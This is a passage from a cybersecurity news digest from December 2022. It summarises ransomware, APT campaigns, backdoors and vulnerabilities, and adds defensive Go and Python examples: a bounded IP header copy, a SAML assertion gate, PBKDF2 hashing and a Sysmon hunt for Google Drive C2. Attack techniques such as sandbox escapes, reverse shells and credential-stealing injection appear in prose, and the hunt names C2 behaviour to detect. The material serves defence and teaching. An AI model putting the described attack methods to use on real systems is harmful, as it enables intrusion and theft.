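	inner, err := ipHdrLen(quoted)
	if err != nil {
		return v, fmt.Errorf("quoted IP header: %w", err)
	}
	v.InnerIPLen, v.InnerOptions = inner, inner-ipMinHdr
	v.InnerProto = quoted[9]
	return v, nil
}

// CopyHeader copies an IP header into a buffer sized for the largest legal
// header and refuses lengths that would not fit. Against a 20-byte destination
// the same copy overruns by OuterOptions or InnerOptions bytes, up to 40.
func CopyHeader(src []byte, hdrLen int) ([ipMaxHdr]byte, error) {
	var dst [ipMaxHdr]byte
	if hdrLen < ipMinHdr || hdrLen > ipMaxHdr || hdrLen > len(src) {
		return dst, errors.New("refusing copy: header length out of range")
	}
	copy(dst[:], src[:hdrLen])
	return dst, nil
}

// BuildSample constructs (it is not captured traffic) a Destination Unreachable
// message whose outer and quoted IP headers carry the given IHL values, so
// options can be placed in either header; option bytes are left zeroed.
func BuildSample(outerIHL, innerIHL byte) []byte {
	outer, inner := int(outerIHL)*4, int(innerIHL)*4
	pkt := make([]byte, outer+icmpMinHdr+inner+8) // plus 8 bytes of quoted payload
	pkt[0] = 0x40 | outerIHL // version 4, IHL
	pkt[9] = 1               // protocol: ICMP
	pkt[outer] = 3           // ICMP type 3: destination unreachable
	q := outer + icmpMinHdr
	pkt[q] = 0x40 | innerIHL
	pkt[q+9] = 1 // the quoted datagram was our own ICMP echo request
	return pkt
}
```

With IHL = 15 in both headers, OuterOptions and InnerOptions each come out at 40, the figure in the advisory; a datagram cut short anywhere is rejected rather than read past its end.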

Uncredited, Stack overflow in ping(8), security advisory, 29 November 2022. Available online at https://www.freebsd.org/security/advisories/FreeBSD-SA-22:15.ping.asc.

Chinese Hackers Stole Tens of Millions of Dollars of US COVID Relief Funding

According to the US Secret Service, hackers associated with the Chinese government stole at least $US20 million in US COVID relief benefits, including Small Business Administration loans and unemployment insurance funds. The theft was performed by APT41, aka Winnti, a threat actor that splits its efforts between financially motivated cybercrime on its own behalf and cyber-espionage for the Chinese government.

Several members of APT41 were indicted by the Department of Justice for espionage operations, with Deputy Attorney General Jeffrey Rosen commenting at the time, "Regrettably, the Chinese Communist Party has chosen a different path of making China safe for cybercriminals so long as they attack computers outside China and steal intellectual property helpful to China".

Bing, Christopher, Chinese hackers stole millions worth of U.S. COVID relief money, Secret Service says, Reuters, 6 December 2022. Available online at https://www.reuters.com/technology/chinese-hackers-stole-millions-worth-us-covid-relief-money-secret-service-says-2022-12-05/.

Healthcare Ransomware Attacks Escalating

Ransomware attacks on hospitals, health insurers and other parts of the healthcare sector are steadily increasing and it seems likely that this will become one of the major security trends of 2023.

Last week, it was the turn of New Zealand health insurance company Accuro, which announced that it had lost access to its systems - which seems to be code for ransomware - and while it had no evidence of personal health information being exfiltrated, it could not rule it out. The previous month, patient data stolen from NZ GP network Pinnacle Health was posted on the web. And, of course, I need not mention Medibank.

Most recently, a hospital complex in Versailles, in the suburbs of Paris, had to cancel operations and transfer some patients because of a cyberattack, according to the French health ministry. The Hospital Centre of Versailles, which consists of Andre-Mignot Hospital, Richaud Hospital and the Despagne Retirement Home, had to shut down its computer systems, internet access and phone systems due to what appears to be a ransomware attack.

Extra staff had to be called in to the intensive care unit because although the equipment there was still working, it was not connected to the network, and doctors had to rely on people watching the screens. Six patients in total had to be transferred - three from intensive care and three from the neonatal unit, said the Minister, Francois Braun, during a visit to the hospital.

Many other French hospitals have been attacked - the same hospital had successfully defended itself against previous attacks, but back in August the Corbeil-Essonnes hospital, also on the outskirts of Paris, was disrupted for several weeks by a ransomware attack. Although in that case a $US10 million ransom was demanded, it would not be paid, since the French government has legislated to make ransom payments illegal.

AFP, French hospital suspends operations after cyber attacks, France 24, 5 December 2022. Available online at https://www.france24.com/en/france/20221205-french-hospital-suspends-operations-after-cyber-attacks.

Palo Alto Introduces Medical IoT Security

In the cases above, the key equipment was not affected - only the networks and computers. But network-connected medical equipment such as infusion pumps, imaging devices (X-ray, MRI and CT scanners) and even more basic ECG monitors are increasingly based on embedded microcontrollers or computers - in many cases, even running COTS operating systems.

In fact, according to Palo Alto Networks' Unit 42 Threat Research, 75% of infusion pumps they studied had at least one vulnerability or threw up a security alert, while 51% of X-ray machines had a high-severity vulnerability (CVE-2019-11687). 44% of CT scanners and 31% of MRI machines had high-severity exposures and - not really a surprise - 20% of common imaging devices were running an unsupported version of Windows.

Seeing an obvious market opportunity - not to mention a need - Palo Alto has introduced a new Medical IoT Security product which will assess all devices and guide network segmentation to enforce the principle of least privilege, using machine learning. There's lots of other functionality, including ensuring data residency requirements in various countries are met, regulatory compliance, device vulnerability management and automated response to anomalies.

It will be interesting to see how this pans out. According to medical professionals I have spoken to, they often need privileges in excess of their normal roles in order to respond to patient emergencies, and so attempts to tightly lock down medical information systems can be terribly counter-productive. But, as the previous story shows, the opposite approach doesn't work either. Finding the 'sweet spot' is going to be a difficult process.

Xu Zou, The Medical IoT Security To Depend on When Lives Depend on You, blog post, 5 December 2022. Available online at https://www.paloaltonetworks.com/blog/2022/12/medical-iot-security-to-depend-on/.

Koppel, R., Smith, S., Blythe, J., & Kothari, V., Workarounds to Computer Access in Healthcare Organizations: You Want My Password or a Dead Patient?, in Driving Quality in Informatics: Fulfilling the Promise, 2015, vol. 208, pp. 215–220.



by Les Bell - Monday, 5 December 2022, 8:41 AM

News Stories


Golang SAML Library Allowed Authentication Bypass

One of the more popular distributed authentication protocols for web services is SAML, the Security Assertions Markup Language. When a user wants to authenticate to a service provider, she obtains a SAML assertion from her identity provider (to which she has previously authenticated using - probably - multi-factor authentication). She will then relay the SAML assertion to the service provider, which will validate the assertion and - because it trusts the identity provider - will then trust the user.

However, because the SAML assertion passes through the hands of the putative user, who could tamper with it, the assertion must be signed. But a twist in the way SAML assertions are constructed has led to a vulnerability (CVE-2022-41912), discovered by Google's Project Zero, in the crewjam SAML library for the Go programming language. A single SAML XML element can contain multiple assertions, and the crewjam library only validated the signature on the first. An attacker could therefore construct a SAML message containing one signed assertion and one or more unsigned assertions, allowing an authentication bypass awarded a CVSS score of 9.1.

There are no workarounds for this vulnerability - the only fix is to update to crewjam/saml version 0.4.9 or later.
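As an added example (not the crewjam library's code), here is the structural check a service provider can make before it even begins signature verification: count the Assertion elements in the Response and confirm that each one carries its own signature, rejecting the message otherwise. The namespaces are the standard SAML 2.0 and XML-DSig ones; the sample messages are constructed, with placeholder signature values, and a Response-level signature is assumed not to be relied on.

```go
package main

import (
	"encoding/xml"
	"errors"
	"fmt"
	"io"
	"strings"
)

const (
	samlNS  = "urn:oasis:names:tc:SAML:2.0:assertion"
	samlpNS = "urn:oasis:names:tc:SAML:2.0:protocol"
	dsigNS  = "http://www.w3.org/2000/09/xmldsig#"
)

// AssertionAudit is the result of a structural pass over a SAML Response.
type AssertionAudit struct {
	Total    int   // saml:Assertion elements found anywhere in the Response
	Unsigned []int // 1-based positions of those with no ds:Signature child of their own
}

// AuditAssertions streams through the document and records, for every saml:Assertion,
// whether a ds:Signature is its direct child. It does no cryptographic verification;
// it only asks how many assertions there are and which carry a signature at all.
func AuditAssertions(doc string) (AssertionAudit, error) {
	var audit AssertionAudit
	type open struct {
		depth, index int
		signed       bool
	}
	var stack []open
	depth := 0
	dec := xml.NewDecoder(strings.NewReader(doc))
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return audit, nil
		}
		if err != nil {
			return audit, err
		}
		switch t := tok.(type) {
		case xml.StartElement:
			depth++
			isAssertion := t.Name.Space == samlNS && t.Name.Local == "Assertion"
			isSig := t.Name.Space == dsigNS && t.Name.Local == "Signature"
			if isAssertion {
				audit.Total++
				stack = append(stack, open{depth: depth, index: audit.Total})
			} else if isSig && len(stack) > 0 && stack[len(stack)-1].depth == depth-1 {
				stack[len(stack)-1].signed = true // signature sits directly under this assertion
			}
		case xml.EndElement:
			if n := len(stack); n > 0 && stack[n-1].depth == depth {
				if !stack[n-1].signed {
					audit.Unsigned = append(audit.Unsigned, stack[n-1].index)
				}
				stack = stack[:n-1]
			}
			depth--
		}
	}
}

// AcceptResponse is the gate to apply before trusting anything in the message:
// exactly one Assertion, and that one signed. Verifying the signature itself
// comes afterwards and is out of scope here.
func AcceptResponse(doc string) error {
	audit, err := AuditAssertions(doc)
	if err != nil {
		return fmt.Errorf("malformed SAML response: %w", err)
	}
	switch {
	case audit.Total == 0:
		return errors.New("no Assertion element present")
	case audit.Total > 1:
		return fmt.Errorf("%d Assertion elements present, expected exactly one", audit.Total)
	case len(audit.Unsigned) > 0:
		return fmt.Errorf("assertion(s) at position %v carry no signature", audit.Unsigned)
	}
	return nil
}

// SampleAssertion and BuildResponse construct demonstration messages; the
// Signature body is a placeholder, not a real XML-DSig value.
func SampleAssertion(id, subject string, signed bool) string {
	sig := ""
	if signed {
		sig = `<ds:Signature xmlns:ds="` + dsigNS + `"><ds:SignedInfo/>` +
			`<ds:SignatureValue>PLACEHOLDER</ds:SignatureValue></ds:Signature>`
	}
	return `<saml:Assertion xmlns:saml="` + samlNS + `" ID="` + id + `">` + sig +
		`<saml:Subject><saml:NameID>` + subject + `</saml:NameID></saml:Subject></saml:Assertion>`
}
func BuildResponse(assertions ...string) string {
	return `<samlp:Response xmlns:samlp="` + samlpNS + `" ID="r1">` + strings.Join(assertions, "") + `</samlp:Response>`
}
```

A Response carrying one signed assertion passes; one carrying a signed first assertion followed by an unsigned second one, the shape described above, is rejected before any signature is checked.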

crewjam, crewjam/saml vulnerable to signature bypass via multiple Assertion elements due to improper authentication, security advisory, 2 December 2022. Available online at https://github.com/advisories/GHSA-j2jp-wvqg-wc2g.

Florida Man Gets 18 Months for Part in SIM Swap, Crypto Heist

A US District Court sentenced a Florida man to 18 months in prison last week for his part in a cryptocurrency theft which netted over $US20 million. US Attorney Damian Williams said,

"Nicholas Truglia and his associates stole a staggering amount of cryptocurrency from the victim through a complex SIM swap scheme. Nevertheless, today's sentencing goes to show that no matter how sophisticated the crime is, this Office will continue to successfully prosecute those who choose to defraud others."

SIM swapping, also known as phone number porting, allows an attacker to link a victim's phone number to a new Subscriber Identity Module controlled by the attacker. Once this has been done, mTAN's (mobile transaction authentication numbers) and other messages sent to the victim will be received by the attacker, who can use this to access the victim's accounts.

In this case, the attackers were able to obtain access to the victim's cryptocurrency wallet, and used Truglia's online account to plunder the victim's wallet, converting the proceeds into Bitcoin and then dividing up the loot. Truglia's share amounted to roughly $US673,000. In addition to his 18-month sentence, Truglia, aged 25, was sentenced to 3 years of supervised release, ordered to forfeit $US983,010.72 and further ordered to pay $US20,379,007 in restitution to the victim within 60 days.

Biase, Nicholas, Florida Man Sentenced To 18 Months For Theft Of Over $20 Million In SIM Swap Scheme, press release, 1 December 2022. Available online at https://www.justice.gov/usao-sdny/pr/florida-man-sentenced-18-months-theft-over-20-million-sim-swap-scheme.

Compromised Android Platform Certificates Used to Sign Malware

Malware reverse engineer Łukasz Siewierski has discovered a new exploit against Android mobile devices. Android apps are signed with private keys and validated with the matching certificates. In particular, platform certificates (and their keys) are used - by platform vendors like Samsung, LG and others - to sign the 'android' application on the system image, which runs with a highly privileged user ID, android.uid.system, and holds system permissions including permissions to access user data.

Any other application signed with the same certificate can declare that it wants to run with the same user ID, getting the same level of privileged access.

Now it appears that some platform certificates have been leaked or stolen - as long ago as 2016 - and used to sign malware samples. Searching for the SHA2-256's of some of the samples on VirusTotal shows they are backdoors, loaders and various other exploits which remain undetected by most engines. Fortunately, in the last few days, the various affected platform vendors have rotated their keys and issued updates, and Google has also added detections in the Google Play Store as well as their Build Test Suite.

However, the extent to which these signed malware samples spread in the wild is unknown.

antho...@google.com, Issue 100: Platform certificates used to sign malware, APVI issue, 12 November 2022. Available online at https://bugs.chromium.org/p/apvi/issues/detail?id=100.

Siewierski, Łukasz, New AVPI entry: platform certificates used to sign malware, tweet, 1 December 2022. Available online at https://twitter.com/maldr0id/status/1598068216391405568.



by Les Bell - Saturday, 3 December 2022, 10:43 AM

News Stories


Google Shows Benefits of Memory Safe Languages

Operating systems and high-performance applications (especially for low-powered devices) have traditionally been written in the C and C++ programming languages, which suffer from problems with safe memory management. C, in particular, relies on the programmer correctly matching malloc() (and similar) function calls, which allocate memory blocks, with the corresponding free() calls - something that is particularly tricky in interrupt-driven and multi-threaded code. Forgetting to call free() results in memory leaks and swap file growth, while calling free() more than once on the same pointer will corrupt the heap (or the equivalent structure in the underlying OS). Worse still are use-after-free vulnerabilities - and we haven't yet mentioned buffer overflows, which are probably the most exploited class of vulnerabilities over many decades.

Yet memory-safe languages - Pascal, Ada, Java and others - have been available for decades and only resisted on grounds of efficiency. The most recent and most efficient examples, like Kotlin and Rust, have arrived at a time when processors are so powerful that efficiency is no longer a problem, and so support for Rust is being introduced into the Linux kernel and has already been introduced into the Android mobile OS.

[Bar chart showing decline of memory safety vulnerabilities.]

In a blog post, Google provides statistics that show how the introduction of memory-safe languages into Android has dramatically reduced that class of vulnerability. From 2019 to 2022 the annual number of reported memory safety vulnerabilities has gone from 223 down to just 85. It's no coincidence that 2022's Android 13 is the first release where most new code is in a memory safe language, and that 2022 is the first year where the majority of vulnerabilities do not relate to memory safety.

This is good for security; to date, there have been no memory safety vulnerabilities discovered in Android's Rust code.

Of course, this change is not the only contributor to reducing vulnerabilities in Android; the existing C/C++ is being hardened using a variety of tools, although the fact that most of Android's API's are implemented in Java also helps. The Google blog post provides some useful ammunition for developers who want to persuade their shops to migrate to memory-safe languages.

Vander Stoep, Jeffrey, Memory Safe Languages in Android 13, Google Security Blog, 1 December 2022. Available online at https://security.googleblog.com/2022/12/memory-safe-languages-in-android-13.html.

CISA Warns of Cuba Ransomware

The FBI and the US Cybersecurity & Infrastructure Security Agency have issued a joint cybersecurity advisory concerning the increased activities of Cuba ransomware operators. Cuba, which is not associated with the Republic of Cuba, was first observed in 2021, and by mid-2022 its operators had compromised over 100 entities worldwide, demanding over $US145 million in ransom payments, of which $US60 million was paid.

Their primary targets are the financial services, government, healthcare, manufacturing and IT sectors, mostly in the US, and their tactics, techniques and procedures have continued to evolve, exploiting new vulnerabilities for initial compromise and then using a variety of tools for privilege escalation. There also seems to be a link between the Cuba threat actors, the Industrial Spy ransomware and the operators of the RomCom remote access trojan, with the Cuba group selling data exfiltrated by their ransomware via Industrial Spy's online market and also deploying the RomCom RAT.

The CISA advisory provides a complete rundown, including IOC's and MITRE ATT&CK techniques.

Uncredited, #StopRansomware: Cuba Ransomware, cybersecurity advisory alert AA22-335A, 1 December 2022. Available online at https://www.cisa.gov/uscert/ncas/alerts/aa22-335a.

Android Trojan Steals Facebook Logins

While Android security continues to improve (see above), the mobile OS still has its unfair share of trojaned apps which are being disseminated through the Google Play Store as well as stores which permit side-loaded apps. Zimperium zLabs has documented a long-running Android threat campaign, dubbed the Schoolyard Bully Trojan, which has spread to over 300,000 victims, stealing their Facebook credentials.

Disguised as legitimate educational applications providing books on a range of topics, primarily for Vietnamese readers, these apps are trojaned with a Facebook-specific infostealer, grabbing the victims' email, phone number, password, name and Facebook ID. In many cases, naive users re-use the same password for both Facebook and also for financial accounts, making this campaign even more profitable. Despite the Vietnamese language focus, Zimperium found over 300,000 victims across 71 countries.

The campaign's techniques are also interesting - the credential theft is achieved via JavaScript injection: the legitimate Facebook login URL is loaded with additional, injected, code which extracts the user's credentials and then sends them to the threat actor's Firebase C2 site. The malware also uses native libraries as an evasion technique, getting past the majority of antivirus products, including those which use machine learning, and it encodes the exfiltrated data to hide it from detection mechanisms.

Gupta, Nipun, Schoolyard Bully Trojan Facebook Credential Stealer, blog post, 1 December 2022. Available online at https://www.zimperium.com/blog/schoolyard-bully-trojan-facebook-credential-stealer/.



by Les Bell - Friday, 2 December 2022, 8:56 AM

News Stories


LastPass Hit Again

On their web site, LastPass is notifying customers of another security incident which appears to be a follow-up to the previous incident, in August. Back then, an unidentified threat actor was able to gain access to LastPass' development environment, obtaining some source code and technical information. The incident was contained, and no customer data - especially customer password vaults - were accessed.

However, it seems the attackers got something useful. In the latest incident, the firm detected unusual activity within a third-party cloud storage service which is shared by LastPass and its sister company GoTo (GoToMeeting, GoToConnect). Having once again retained the services of Mandiant, the company has determined that an unauthorized party - likely the same threat actor - used information obtained in the earlier breach to gain access to some customer information, although customer passwords will, of course, be encrypted.

It sounds as though cloud access credentials were embedded somewhere in the stolen source - a perennial, and intractable, problem when you need code to access external services. And you can bet that if customer password vaults were stolen, the attackers will be inspecting LastPass' code, looking for implementation flaws in the encryption.

Toubba, Karim, Notice of Recent Security Incident, blog post, 30 November 2022. Available online at https://blog.lastpass.com/2022/11/notice-of-recent-security-incident/.

MD5 Considered Harmful

The Commission Nationale de l'Informatique et des Libertés (the data protection regulator in France) has handed down a decision which should give software developers everywhere pause to consider their code. The regulator fined energy company Électricité de France (EDF) €600,000 over customer privacy issues. Part of the judgement dealt with routine privacy matters such as sending commercial emails, data collection for undefined purposes and unreliable handling of data access and deletion requests.

But the final part dealt specifically with insecure handling of passwords. Generally-accepted good practice says that passwords should be salted and then hashed using a suitably strong digest algorithm - and EDF claimed that it was doing this. However, in reality it was still storing the passwords of over 25,000 customers as unsalted MD5 hashes.

MD5, which produces a 128-bit digest, is deprecated by virtually all regulators and standards authorities (as is SHA-1, which produces a 160-bit digest). But it was the lack of salt that really troubled the French regulator, especially since, although EDF had since adopted SHA2-512 for newer passwords, it still held 2.4 million unsalted SHA2-512 digests. Although EDF had cleaned up its act and was now both salting and hashing correctly, it was still fined.

My advice (and it's what I've taught in university courses): at the very least, make use of language facilities for password salting and hashing, such as PHP's password_hash() and password_verify() functions, which randomly salt a password and hash it with the bcrypt (or optionally, argon2) hash function. Better still, use PBKDF2 (Password-Based Key Derivation Function 2) which will apply a user-specified number of iterations of the chosen hash function, and also incorporates salt. By choosing a large number of iterations, we increase the work factor for both users and attackers - but since users normally only enter their password once, they will barely notice the delay, while attackers trying brute force and dictionary attacks will really be slowed down.
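Added example (not from the Sophos article, EDF or the PHP library): PBKDF2 written out from RFC 8018 with Go's standard library, so the iteration count described above is visible as the inner loop, together with a salted store-and-verify routine and a helper that times the work factor. The derivation is checked against the published RFC 6070 HMAC-SHA1 test vectors; the iteration counts and sample passwords are illustrative.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha1"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"hash"
	"time"
)

// PBKDF2 implements RFC 8018 section 5.2 with HMAC as the PRF:
//
//	T_i = U_1 xor U_2 xor ... xor U_c,  U_1 = PRF(P, S || INT(i)),  U_j = PRF(P, U_{j-1})
//
// The iteration count c is the work factor: each extra iteration costs a
// legitimate login one more HMAC, and costs an attacker the same per guess.
func PBKDF2(prf func() hash.Hash, password, salt []byte, iter, dkLen int) []byte {
	mac := hmac.New(prf, password)
	hLen := mac.Size()
	blocks := (dkLen + hLen - 1) / hLen
	out := make([]byte, 0, blocks*hLen)
	u := make([]byte, 0, hLen)
	t := make([]byte, hLen)
	var ctr [4]byte
	for i := 1; i <= blocks; i++ {
		binary.BigEndian.PutUint32(ctr[:], uint32(i))
		mac.Reset()
		mac.Write(salt)
		mac.Write(ctr[:])
		u = mac.Sum(u[:0]) // U_1
		copy(t, u)
		for j := 1; j < iter; j++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(u[:0]) // U_j
			for k := range t {
				t[k] ^= u[k]
			}
		}
		out = append(out, t...)
	}
	return out[:dkLen]
}

// Record is what belongs in the database: salt, work factor and derived key,
// never the password itself and never an unsalted digest of it.
type Record struct {
	Iter int
	Salt []byte
	DK   []byte
}

// HashPassword derives a record with a fresh random 16-byte salt, so two users
// who chose the same password end up with unrelated records.
func HashPassword(password string, iter int) (Record, error) {
	salt := make([]byte, 16)
	if _, err := rand.Read(salt); err != nil {
		return Record{}, err
	}
	return Record{Iter: iter, Salt: salt, DK: PBKDF2(sha256.New, []byte(password), salt, iter, 32)}, nil
}

// Verify re-derives with the stored salt and count and compares in constant time.
func (r Record) Verify(password string) bool {
	dk := PBKDF2(sha256.New, []byte(password), r.Salt, r.Iter, len(r.DK))
	return subtle.ConstantTimeCompare(dk, r.DK) == 1
}

// WorkFactor times one derivation at the given count: the delay a user meets
// once per login and an attacker meets once per guess.
func WorkFactor(iter int) time.Duration {
	start := time.Now()
	PBKDF2(sha256.New, []byte("correct horse battery staple"), []byte("constructed-salt"), iter, 32)
	return time.Since(start)
}

func main() {
	// Published RFC 6070 vector: PBKDF2-HMAC-SHA1("password", "salt", c=4096, 20 bytes)
	// should print 4b007901b765489abead49d926f721d065a429c1.
	fmt.Println(hex.EncodeToString(PBKDF2(sha1.New, []byte("password"), []byte("salt"), 4096, 20)))

	const iter = 100_000 // illustrative; tune to what your login path can afford
	rec, err := HashPassword("Tr0ub4dor&3", iter)
	if err != nil {
		panic(err)
	}
	fmt.Println("correct password verifies:", rec.Verify("Tr0ub4dor&3"))
	fmt.Println("wrong password verifies:  ", rec.Verify("Tr0ub4dor&4"))
	for _, c := range []int{1_000, iter} {
		fmt.Printf("%7d iterations: %v\n", c, WorkFactor(c))
	}
}
```

Hashing the same password twice yields two different records, which is exactly what the unsalted MD5 and SHA2-512 stores in the EDF case lacked.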

Ducklin, Paul, Serious Security: MD5 considered harmful - to the tune of $600,000, blog post, 30 November 2022. Available online at https://nakedsecurity.sophos.com/2022/11/30/serious-security-md5-considered-harmful-to-the-tune-of-600000/.

New Backdoor Exploits Old Redis Vulnerability

Researchers at cloud security firm Aqua Security have observed a new piece of malware which attempted to exploit one of their honeypots using CVE-2022-0543, a vulnerability in the Redis in-memory database. Redis is widely deployed on web servers, particularly for page caching, although it has many other applications where a high-performance non-relational database is required. CVE-2022-0543 is a vulnerability in the Debian (and Ubuntu) library for the Lua scripting language engine which is a core component of Redis.

By connecting to a vulnerable Redis server, the attacker is able to execute Redis commands which effectively clone a Redis server that contains a shared library, exp_lin.so, which contains the exploit. Once this is loaded, the attacker is able to escape the Lua scripting engine sandbox and execute arbitrary commands - one of which downloads the new malware, named Redigo.

The malware, which as the name suggests is written in the Go programming language, mimics the Redis communications protocol to connect to its C2 server, after which the victim turns into a Redis client with the attacker becoming the server. The commands sent to the infected machine indicate that the goal is to exploit the Redis server itself, rather than the underlying host.

Aqua's report provides a full analysis with IOC's - useful since, being a new malware sample, VirusTotal did not identify Redigo. A bigger question, however, is why new malware is appearing for a vulnerability that was patched back in February - clearly, attackers are still finding victims, which indicates poor vulnerability management processes.

Yaakov, Nitzan and Ofek Itach, Aqua Nautilus Discovers Redigo - New Redis Backdoor Malware, threat alert, 1 December 2022. Available online at https://blog.aquasec.com/redigo-redis-backdoor-malware.



by Les Bell - Thursday, 1 December 2022, 9:14 AM

News Stories


Google Threat Analysis Group Uncovers Commercial Spyware

Google's Threat Analysis Group (TAG) has detailed an exploitation framework which they uncovered when an anonymous submitter disclosed three bugs to the Chrome bug reporting program. The bugs, each accompanied by instructions and a source code archive, are:

  • Heliconia Noise: a web framework for deploying an exploit for a Chrome renderer bug followed by a sandbox escape
  • Heliconia Soft: a web framework which deploys a PDF containing a Windows Defender exploit
  • Files: a set of Firefox exploits for Linux and Windows

The vulnerabilities were patched by the respective vendors in 2021 and early 2022, but were likely used as 0days prior to that. The first two exploits end with a launcher DLL that fetches the exploitation agent from a URL and then launches it - they were supplied with a dummy agent called agent_simple and it is likely that, in reality, this will be replaced by a customized agent.

Heliconia Noise includes a pre-commit cleaning script which checks that the produced binaries do not contain sensitive strings, such as the project name, developer names, etc. Ironically, this script leaks all of these, including the name of the company behind this project, Variston IT. Variston Information Technology is a small Barcelona-based company which, it claims, offers "tailor made Information Security Solutions". From these exploits, it seems that Variston has joined the ranks of NSO Group, Cytrox and others in offering commercial spyware.

Lecigne, Clement and Benoit Sevens, New details on commercial spyware vendor Variston, blog post, 30 November 2022. Available online at https://blog.google/threat-analysis-group/new-details-on-commercial-spyware-vendor-variston/.

North Korean Backdoor Uses Google Drive for C2

ESET researchers have reported on a newly-analyzed backdoor called Dolphin, deployed by North Korean group APT37 (ScarCruft, Reaper) against targets in South Korea. First detected in early 2021, Dolphin was used in a watering-hole attack on a South Korean online newspaper, in that case being deployed as the final stage of the attack via an Internet Explorer exploit and some shellcode which loaded another APT37 backdoor called BLUELIGHT. Most attacks ended with BLUELIGHT, but ESET discovered that, on selected targets, BLUELIGHT was then used to download and chain to Dolphin.

While BLUELIGHT can exfiltrate selected files upon command, Dolphin extends this capability to active searching of drives and the exfiltration of files with extensions of interest. The backdoor initially reports some basic information about the victim system (name, username, OS version, local and external IP addresses, installed security products, and a check for a debugger and other tools such as Wireshark) and then downloads commands, issued by its operators, from Google Drive storage, executing them and uploading the results.

Dolphin's commands give it extensive capabilities beyond file exfiltration. It can also search connected portable devices such as smartphones, using the Windows Portable Device API, take screenshots, log keystrokes, download and execute shellcode, run arbitrary shell commands and steal credentials. Another interesting trick found in some versions is to downgrade the security of a user's Google account by enabling IMAP access to Gmail and then enabling "less secure app access", presumably to backdoor the Google account.

The ESET report provides a full analysis of the evolution of Dolphin, as well as MITRE ATT&CK techniques and IOCs.

Jurčacko, Filip, Who's swimming in South Korean waters? Meet ScarCruft's Dolphin, blog post, 30 November 2022. Available online at https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/.
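Dolphin's use of Google Drive for tasking and exfiltration is the detection problem in miniature: the destination looks like ordinary SaaS traffic, so the usable signal is which process is talking to it. The hunt below is an added example (not ESET's code, and not an IOC from the report) over constructed log lines in a JSON-per-line shape resembling Sysmon Event ID 3 (NetworkConnect); the expected-process table and install paths are assumptions to be tuned to a real fleet, and the Drive endpoint list assumes the Drive API is served under googleapis.com along with Google's other APIs.

```python
"""Hunt for Google-Drive C2 in Sysmon network-connect events by process,
not destination. Sample events are constructed; field names follow Sysmon
Event ID 3 (NetworkConnect) as forwarded in JSON-per-line form."""
import json
import ntpath

# Endpoints Drive clients and Drive API users reach (assumption; the Drive
# API is served under googleapis.com alongside many other Google APIs).
DRIVE_DOMAINS = ("drive.google.com", "googleapis.com")

# Processes expected to talk to Drive on a managed endpoint, keyed to the
# directory they are installed under (assumption; tune to your inventory).
EXPECTED_IMAGES = {
    "chrome.exe": r"c:\program files\google\chrome\application",
    "msedge.exe": r"c:\program files (x86)\microsoft\edge\application",
    "firefox.exe": r"c:\program files\mozilla firefox",
    "googledrivefs.exe": r"c:\program files\google\drive file stream",
}

# Constructed sample events: a real browser, a browser-named binary running
# from %TEMP%, an unknown binary in a roaming profile, Outlook, and a
# process-create event that the Drive rule must ignore.
SAMPLE_LOG = r"""
{"EventID": 3, "User": "CORP\\alice", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "Initiated": "true", "Protocol": "tcp", "DestinationHostname": "drive.google.com", "DestinationPort": 443}
{"EventID": 3, "User": "CORP\\alice", "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\chrome.exe", "Initiated": "true", "Protocol": "tcp", "DestinationHostname": "www.googleapis.com", "DestinationPort": 443}
{"EventID": 3, "User": "CORP\\alice", "Image": "C:\\Users\\alice\\AppData\\Roaming\\Helper\\svc_update.exe", "Initiated": "true", "Protocol": "tcp", "DestinationHostname": "www.googleapis.com", "DestinationPort": 443}
{"EventID": 3, "User": "CORP\\alice", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "Initiated": "true", "Protocol": "tcp", "DestinationHostname": "outlook.office365.com", "DestinationPort": 443}
{"EventID": 1, "User": "CORP\\alice", "Image": "C:\\Users\\alice\\AppData\\Roaming\\Helper\\svc_update.exe", "CommandLine": "svc_update.exe"}
"""


def parse_events(text: str) -> list[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_drive_host(host: str) -> bool:
    h = host.lower()
    return any(h == d or h.endswith("." + d) for d in DRIVE_DOMAINS)


def hunt_drive_c2(events: list[dict]) -> list[dict]:
    """Return outbound connections to Drive endpoints from processes that
    either are not expected to use Drive or carry an expected name from the
    wrong path (a binary masquerading as the browser)."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 3 or str(ev.get("Initiated", "")).lower() != "true":
            continue
        if not is_drive_host(ev.get("DestinationHostname", "")):
            continue
        image = ev["Image"]
        name = ntpath.basename(image).lower()
        folder = ntpath.dirname(image).lower()
        expected_dir = EXPECTED_IMAGES.get(name)
        if expected_dir is None:
            reason = "unexpected process contacting Google Drive"
        elif not folder.startswith(expected_dir):
            reason = "expected process name running from an unexpected path"
        else:
            continue
        hits.append({"user": ev.get("User"), "image": image,
                     "host": ev["DestinationHostname"], "reason": reason})
    return hits
```

Two practical notes: Sysmon fills DestinationHostname from a reverse lookup and it can be blank, so in production pair this with the DNS query event (Event ID 22) to recover the name the process actually asked for; and the "less secure app access" downgrade happens on the Google account, not the endpoint, so that signal has to come from the account-side audit logs rather than from host telemetry.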

China-related Cyberespionage Campaign Targets Philippines - Also SE Asia, Asia-Pacific, US and Europe

Mandiant Managed Defense has lifted the lid on a cyberespionage campaign being run in the Philippines by a China-nexus group tracked as UNC4191. Although the campaign leveraged USB devices to infect machines in the Philippines, the targeted organizations were based in other locations around the world.

After initial infection via USB, the threat actor used legitimately-signed binaries to side-load malware, including three new families Mandiant named MISTCLOAK, DARKDEW and BLUEHAZE. This led to the deployment of a renamed NCAT binary which created a reverse shell on the victim's system, giving the threat actor backdoor access. The malware also replicated itself by infecting any new removable drives plugged into the system.

Timestamps in the binaries date back to September 2021, indicating that this campaign may have been running for some time, especially considering the self-propagating nature of the malware. The range of both public- and private-sector entities targeted suggests that the campaign objective is the collection of intelligence related to China's political and commercial interests.

The Mandiant report provides a full analysis, including YARA rules and IOCs.

